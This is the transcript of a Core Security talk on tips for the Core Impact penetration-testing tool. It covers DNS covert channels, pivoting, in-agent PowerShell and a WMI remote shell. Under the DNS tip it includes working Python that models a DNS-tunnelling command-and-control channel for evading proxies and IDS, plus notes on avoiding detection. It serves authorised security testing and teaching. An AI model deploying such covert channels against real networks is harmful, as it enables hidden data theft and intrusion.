CONNECT 2017 Core Impact Tips & Tricks - Martin Gallo, Product Owner, Core Security

Uploaded by core-security, posted 29-Jan-2018


48 views

Category:

Software


1 download

TRANSCRIPT

CONNECT 2017 Core Impact Tips & Tricks

Martin Gallo, Product Owner, Core Security

AGENDA

• Challenge: Restricted environment
• Tip & Trick #1: DNS Channel
• Tip & Trick #2: Temporal Agents
• Tip & Trick #3: Pivoting w/PCAP
• Tip & Trick #4: Remote interface
• Tip & Trick #5: PowerShell
• Tip & Trick #6: Agent-less WMI Shell
• Tip & Trick #7: Customizable reports

Challenge: Restricted environment

• No direct outbound connections
• Network-restricted environment
• Advanced defensive mechanisms

Environment

[Diagram: the Core Impact Console sits on the Workstations Network alongside the corporate users; the Internal Servers Network holds the servers, the critical data and Active Directory; a proxy, IDS/IPS, etc. sit between the internal networks and the Internet; DNS is also shown crossing that boundary]

Tip & Trick #1: DNS Channel

• Communication channel between Impact and the target
• Carried as ordinary DNS traffic on port 53 (UDP or TCP)
• TXT records carry data down to the agent; A-record queries carry data up (the payload is encoded in the queried name)
• No external outbound Internet connection needed on the target: it only has to resolve names through the organisation's DNS, which forwards the queries on to the zone's authoritative server
• Stealthy and useful in restricted environments with a web proxy, IDS/IPS with DPI, etc., where direct or HTTP-based channels are blocked or inspected
• Encrypted, with the full agent functionality available over the channel

Downside:
• Slower than other channels: each query or answer carries only a small payload
• Still visible to DNS monitoring: a high volume of long, unique names under one zone is the classic tunnelling signature
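The two record types map onto the two directions of the channel. The following added example (not Core Impact code; the zone name, the session label and the chunk layout are assumptions chosen for illustration) models that encoding in-process: uploads ride in the labels of A-record queries, downloads come back as TXT strings, and the RFC 1035 name and label limits are what cap the bytes per query and make the channel slow.

```python
"""Toy DNS-carried agent channel: A-record queries carry uploads (target -> console),
TXT answers carry downloads (console -> target).  Added example, not Core Impact code.
AuthoritativeServer stands in for the name server the attacker controls for ZONE, so
everything runs in-process and nothing here touches the network."""
from __future__ import annotations
import base64

ZONE = "c2.example.net"  # assumed attacker-controlled zone (name chosen for this example)
MAX_LABEL = 63           # RFC 1035: one label is at most 63 octets
MAX_NAME = 253           # longest presentation-format name that fits the 255-octet wire limit
TXT_CHUNK = 189          # raw bytes per TXT string: 189 bytes -> 252 base64 chars <= 255


def _b32(data: bytes) -> str:
    # Lower-case, unpadded base32: DNS names are case-insensitive and resolvers may
    # randomise case, which would corrupt base64 in labels; base32 survives it.
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(text: str) -> bytes:
    return base64.b32decode(text.upper() + "=" * (-len(text) % 8))


def _labels(text: str) -> str:
    """Split an encoded payload into dot-joined labels of at most MAX_LABEL chars."""
    return ".".join(text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL))


def bytes_per_query(session: str) -> int:
    """Largest chunk whose base32 form, split into labels, still fits one query name
    of the form <seq>.<payload labels>.<session>.<ZONE>."""
    budget = MAX_NAME - (4 + len(session) + len(ZONE) + 3)  # 4-char seq label + 3 dots
    chars = budget
    while chars + (chars + MAX_LABEL - 1) // MAX_LABEL - 1 > budget:  # dots between labels
        chars -= 1
    return chars * 5 // 8  # 8 base32 chars encode 5 bytes


def encode_upload(data: bytes, session: str) -> list[str]:
    """Upload direction: the payload travels in the *question* of A-record queries.
    Sequence numbers keep the names unique (no cache hits) and allow reordering."""
    size = bytes_per_query(session)
    chunks = [data[i:i + size] for i in range(0, len(data), size)]
    names = [f"{seq:04x}.{_labels(_b32(chunk))}.{session}.{ZONE}"
             for seq, chunk in enumerate(chunks)]
    names.append(f"fin.{len(chunks):04x}.{session}.{ZONE}")  # announces the chunk count
    for name in names:
        assert len(name) <= MAX_NAME and all(len(l) <= MAX_LABEL for l in name.split("."))
    return names


class AuthoritativeServer:
    """Stand-in for the attacker's authoritative server for ZONE."""

    def __init__(self) -> None:
        self.uploads: dict[str, dict[int, bytes]] = {}  # session -> {seq: chunk}
        self.expected: dict[str, int] = {}              # session -> count from 'fin'
        self.outbound: dict[str, bytes] = {}            # session -> bytes to download

    def _parse(self, qname: str) -> tuple[str, list[str], str]:
        labels = qname.lower().rstrip(".").split(".")
        zone = ZONE.split(".")
        if labels[-len(zone):] != zone:
            raise ValueError("query outside our zone")
        return labels[0], labels[1:-len(zone) - 1], labels[-len(zone) - 1]

    def answer_a(self, qname: str) -> str:
        """Record an upload chunk; the A answer itself only acknowledges the query."""
        seq, payload, session = self._parse(qname)
        if seq == "fin":
            self.expected[session] = int(payload[0], 16)
        else:
            self.uploads.setdefault(session, {})[int(seq, 16)] = _unb32("".join(payload))
        return "127.0.0.1"

    def received(self, session: str) -> bytes | None:
        """Reassemble an upload once every announced chunk has arrived (UDP queries
        may be reordered, dropped and retried, hence the sequence numbers)."""
        chunks = self.uploads.get(session, {})
        if session not in self.expected or len(chunks) != self.expected[session]:
            return None
        return b"".join(chunks[i] for i in range(self.expected[session]))

    def queue_download(self, session: str, data: bytes) -> None:
        self.outbound[session] = data

    def answer_txt(self, qname: str) -> list[str]:
        """Download direction: chunk <seq> comes back as one TXT string; an empty
        answer marks the end of the stream."""
        seq, _, session = self._parse(qname)
        start = int(seq, 16) * TXT_CHUNK
        chunk = self.outbound.get(session, b"")[start:start + TXT_CHUNK]
        return [base64.b64encode(chunk).decode()] if chunk else []


def upload(server: AuthoritativeServer, session: str, data: bytes) -> None:
    for name in encode_upload(data, session):  # in reality: sent via the target's resolver
        server.answer_a(name)


def download(server: AuthoritativeServer, session: str) -> bytes:
    out, seq = b"", 0
    while True:
        answer = server.answer_txt(f"{seq:04x}.{session}.{ZONE}")
        if not answer:
            return out
        out += base64.b64decode(answer[0])
        seq += 1
```

With an 8-character session label the budget works out to 138 bytes per A query, which is why the channel is slow. This toy only shows the encoding layer: the real channel is encrypted on top of it, and a production implementation also retries lost UDP queries and falls back to TCP for larger answers.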

Tip & Trick #2: Temporal agents

• Ability to set a termination date for an agent
• Available for client-side, network and Web agents
• Temporary persistence: the agent uninstalls itself automatically when the date is reached
• Useful in short engagements, so nothing is left running after the test ends

Tip & Trick #3: Pivoting w/PCAP

• Install the PCAP plugin after the agent is deployed
• Transparent pivoting through the agent
• Speeds up port and service scans run through the pivot

Tip & Trick #4: Remote interface

• Maps a network interface of the remote agent's host onto the console
• Sets up a VPN-style connection into the target network
• Works on Linux systems too
• Transparent and flexible

Tip & Trick #5: PowerShell

• Run native PowerShell code inside the agent
• The agent instantiates the PowerShell engine through its .NET interface
• Stealthier: no "powershell.exe" process is launched (the engine is still loaded, so PowerShell's own script logging and AMSI scanning still apply)
• PS scripts can be loaded from any URL
• Works over a pivoted connection
• The target does not need to reach the URL itself: the script is fetched on the Impact side and delivered through the agent
• PowerShell Empire integration

Tip & Trick #6: Agent-less WMI shell

• Launches a remote shell using WMI
• No agent installation required
• Integrated with the Identity Manager credential store
• Quick and stealthy, though the process created through WMI is still visible to process-creation auditing on the target

Tip & Trick #7: Customizable reports

• Reports can be customized as desired
• Easy to adapt and tailor to the user's needs
• Fast and effective

Q&A

Got some more tips & tricks to share?

THANK YOU